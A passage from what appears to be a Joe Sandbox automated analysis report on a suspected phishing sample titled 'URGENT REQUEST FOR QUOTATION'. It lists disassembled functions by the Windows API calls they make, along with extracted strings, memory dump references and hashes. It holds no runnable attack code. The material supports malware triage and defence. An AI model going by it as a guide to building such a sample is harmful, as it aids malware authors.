                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
                                                                                                                      • Instruction ID: 8395430a7d9abd82758272c9ee139d26679bb37e314f5df6033502a2c8c37088
                                                                                                                      • Opcode Fuzzy Hash: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
                                                                                                                      • Instruction Fuzzy Hash: 60412A70505BC96DFFB087A8C8447B5BEE06F12344F08805EDAC6565C2EBE59DC8D7A2
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 000B05BC
                                                                                                                      • inet_addr.WSOCK32(?), ref: 000B061C
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 000B0628
                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 000B0636
                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06C6
                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06E5
                                                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 000B07B9
                                                                                                                      • WSACleanup.WSOCK32 ref: 000B07BF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                      • String ID: Ping
                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                      • Opcode ID: 6e382c4f63c32c345e2fec8b06664f01552704d37062d82ecc825c6ef43384ab
                                                                                                                      • Instruction ID: 7ce1caf11426689a9e9e45dfbddc4ec291889288772abec49b16a563077bf483
                                                                                                                      • Opcode Fuzzy Hash: 6e382c4f63c32c345e2fec8b06664f01552704d37062d82ecc825c6ef43384ab
                                                                                                                      • Instruction Fuzzy Hash: F5918E75A086019FD320CF15C888F5BBBE4EF84318F1485A9F4698B6A2CB34ED45CF91
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                      • API String ID: 707087890-567219261
                                                                                                                      • Opcode ID: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
                                                                                                                      • Instruction ID: 0d4d7337f921ac23cd4219ae1e1ab9611e883a0ca561204241412b627afecf51
                                                                                                                      • Opcode Fuzzy Hash: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
                                                                                                                      • Instruction Fuzzy Hash: CE51B131A041169BCF24DF68C9519FEB7E9BF64324B21822AE926E72D5DF31DD40C790
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32 ref: 000B3774
                                                                                                                      • CoUninitialize.OLE32 ref: 000B377F
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,000CFB78,?), ref: 000B37D9
                                                                                                                      • IIDFromString.OLE32(?,?), ref: 000B384C
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000B38E4
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000B3936
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 636576611-1287834457
                                                                                                                      • Opcode ID: 0112f97aef9a5cc8c0cf0b690918559dc0106e319501bb52f651b7977a454376
                                                                                                                      • Instruction ID: 626913a9bfbe5f21e2d1492cf5d289d7a788ed92f3803b082cfa81f78115d974
                                                                                                                      • Opcode Fuzzy Hash: 0112f97aef9a5cc8c0cf0b690918559dc0106e319501bb52f651b7977a454376
                                                                                                                      • Instruction Fuzzy Hash: 446190B1608711AFD721DF54C889FAEB7E8EF49710F204819F5859B291DB70EE48CB92
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 000A33CF
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000A33F0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString$_wcslen
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 4099089115-3080491070
                                                                                                                      • Opcode ID: 15fb83a3f8adcda783f9c8d3bb9efbb243a5ae1c77675f3f0b997089ff6d973b
                                                                                                                      • Instruction ID: f1496586ec337dbdcd529c3b64e392e7141f15e77337846516c837ee56053849
                                                                                                                      • Opcode Fuzzy Hash: 15fb83a3f8adcda783f9c8d3bb9efbb243a5ae1c77675f3f0b997089ff6d973b
                                                                                                                      • Instruction Fuzzy Hash: 5A517C71D00209BADF16EBE4CD46EEEB7B8AF05340F104165F605760A2EB752F98DB61
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                      • API String ID: 1256254125-769500911
                                                                                                                      • Opcode ID: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
                                                                                                                      • Instruction ID: d5867ef3fc190abdd571cf2aa017a74bcb2c4e47defc9fa5d5652e14097cbf31
                                                                                                                      • Opcode Fuzzy Hash: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
                                                                                                                      • Instruction Fuzzy Hash: 4A412B32A041269BCF206F7DDE905BEB7E5AFA0774B244229E421D7280E739DC81E390
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A53A0
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000A5416
                                                                                                                      • GetLastError.KERNEL32 ref: 000A5420
                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 000A54A7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: 17620e79c3a0260d245b625641d8cf7548bc84e0e6dc5e9fa93c6b96e812faff
                                                                                                                      • Instruction ID: 66819cbebef694e858e2ca37cd2b9ae7902e006be29334b736b8615c65e991d8
                                                                                                                      • Opcode Fuzzy Hash: 17620e79c3a0260d245b625641d8cf7548bc84e0e6dc5e9fa93c6b96e812faff
                                                                                                                      • Instruction Fuzzy Hash: A631BF35A006089FD710DFA8C884EEEBBF4FB0A30AF188065E505CB692D775DD82CB90
                                                                                                                      APIs
                                                                                                                      • CreateMenu.USER32 ref: 000C3C79
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 000C3C88
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C3D10
                                                                                                                      • IsMenu.USER32(?), ref: 000C3D24
                                                                                                                      • CreatePopupMenu.USER32 ref: 000C3D2E
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000C3D5B
                                                                                                                      • DrawMenuBar.USER32 ref: 000C3D63
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                      • String ID: 0$F
                                                                                                                      • API String ID: 161812096-3044882817
                                                                                                                      • Opcode ID: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                                                                                                      • Instruction ID: bb9637095a2f00cd8b3ad79d04ec6e909cc9e82f39a1efc198c18bd2fab4abe8
                                                                                                                      • Opcode Fuzzy Hash: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                                                                                                      • Instruction Fuzzy Hash: 0E415675A11609AFEB14CF64E884FAE7BB5FF4A350F14402CF94AA7360D774AA50CB90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000C3A9D
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000C3AA0
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C3AC7
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000C3AEA
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000C3B62
                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 000C3BAC
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 000C3BC7
                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 000C3BE2
                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 000C3BF6
                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 000C3C13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 312131281-0
                                                                                                                      • Opcode ID: e288c12a2e98389e5cff09ec5b4f901061728430ba0d4c0d0079fc6ab5e8c090
                                                                                                                      • Instruction ID: a1d81d38b03c6e566e599dd2d9538a935f25e5ca9e61876364e8f88be825b3c9
                                                                                                                      • Opcode Fuzzy Hash: e288c12a2e98389e5cff09ec5b4f901061728430ba0d4c0d0079fc6ab5e8c090
                                                                                                                      • Instruction Fuzzy Hash: 5D616A75A00248AFDB10DFA8CC81FEE77F8EB09704F104199FA55A72A2D774AE85DB50
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0009B151
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B165
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0009B16C
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B17B
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0009B18D
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1A6
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1B8
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1FD
                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B212
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B21D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      • Opcode ID: 1e75a74ff7a7271e150d5b5de671644b5ec4486076cfd4fe0afc06b0c78acf45
                                                                                                                      • Instruction ID: 14e7ee39502febb726976733fb1d63dd75bb84080a407254d371e969a994cd8f
                                                                                                                      • Opcode Fuzzy Hash: 1e75a74ff7a7271e150d5b5de671644b5ec4486076cfd4fe0afc06b0c78acf45
                                                                                                                      • Instruction Fuzzy Hash: 1F31AD71504204BFEF209F28EE48F6DBBADFB51325F104009FA55D6190D7B8AE819F60
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00062C94
                                                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                                                      • _free.LIBCMT ref: 00062CA0
                                                                                                                      • _free.LIBCMT ref: 00062CAB
                                                                                                                      • _free.LIBCMT ref: 00062CB6
                                                                                                                      • _free.LIBCMT ref: 00062CC1
                                                                                                                      • _free.LIBCMT ref: 00062CCC
                                                                                                                      • _free.LIBCMT ref: 00062CD7
                                                                                                                      • _free.LIBCMT ref: 00062CE2
                                                                                                                      • _free.LIBCMT ref: 00062CED
                                                                                                                      • _free.LIBCMT ref: 00062CFB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: f5bd0660625df2dcfeb3c718c0aee2854385dafe0c9f5fdd918915cbccc42b5d
                                                                                                                      • Instruction ID: 053ce59edaa254d97d7cd6f8cd65d2b17eb2e6fdaf406fe36c15ef6296b839d0
                                                                                                                      • Opcode Fuzzy Hash: f5bd0660625df2dcfeb3c718c0aee2854385dafe0c9f5fdd918915cbccc42b5d
                                                                                                                      • Instruction Fuzzy Hash: 7B117476600508BFCB06EF54D982CDD3BA6FF45390F5145A5FA489F223DA31EE509BA0
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00031459
                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 000314F8
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 000316DD
                                                                                                                      • DestroyWindow.USER32(?), ref: 000724B9
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0007251E
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0007254B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      • Opcode ID: 9a4efee0bf560956642b0905a93ddc1303af162ef2a38b72d0564001ace13b4a
                                                                                                                      • Instruction ID: 45a45f337461acfdfce95a123900eb8885fc5162517d4afc9d8b8ada80eca661
                                                                                                                      • Opcode Fuzzy Hash: 9a4efee0bf560956642b0905a93ddc1303af162ef2a38b72d0564001ace13b4a
                                                                                                                      • Instruction Fuzzy Hash: 2AD16E31B01212CFDB2AEF55C499FA9F7A4BF09700F1582ADE44A6B252CB34AD12CF54
                                                                                                                      APIs
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000A7FAD
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A7FC1
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 000A7FEB
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 000A8005
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8017
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8060
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000A80B0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 769691225-438819550
                                                                                                                      • Opcode ID: 6fe72be19d448ebce5bd4f2fdc7e131a9a0ee427d776704b554d79fa652464dd
                                                                                                                      • Instruction ID: 235b664dee16afb4bf58ce37d226e713a4bc55fb02719c34cf258fde7c2983cd
                                                                                                                      • Opcode Fuzzy Hash: 6fe72be19d448ebce5bd4f2fdc7e131a9a0ee427d776704b554d79fa652464dd
                                                                                                                      • Instruction Fuzzy Hash: 2981B1725082419FDB64DF94C8449AEB3E8BF8A310F148C6EF889D7251EB35DD49CB52
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00035C7A
                                                                                                                        • Part of subcall function 00035D0A: GetClientRect.USER32(?,?), ref: 00035D30
                                                                                                                        • Part of subcall function 00035D0A: GetWindowRect.USER32(?,?), ref: 00035D71
                                                                                                                        • Part of subcall function 00035D0A: ScreenToClient.USER32(?,?), ref: 00035D99
                                                                                                                      • GetDC.USER32 ref: 000746F5
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00074708
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00074716
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0007472B
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00074733
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000747C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                      • Opcode ID: 1109d89cfcf4bdc3fbf5e5355325635cb401d4a6e267661854a5670f982e24b6
                                                                                                                      • Instruction ID: 6fe5d15eacc0f349a28cab3f4900633199e832419099ac738d5fb3f71e6dcae8
                                                                                                                      • Opcode Fuzzy Hash: 1109d89cfcf4bdc3fbf5e5355325635cb401d4a6e267661854a5670f982e24b6
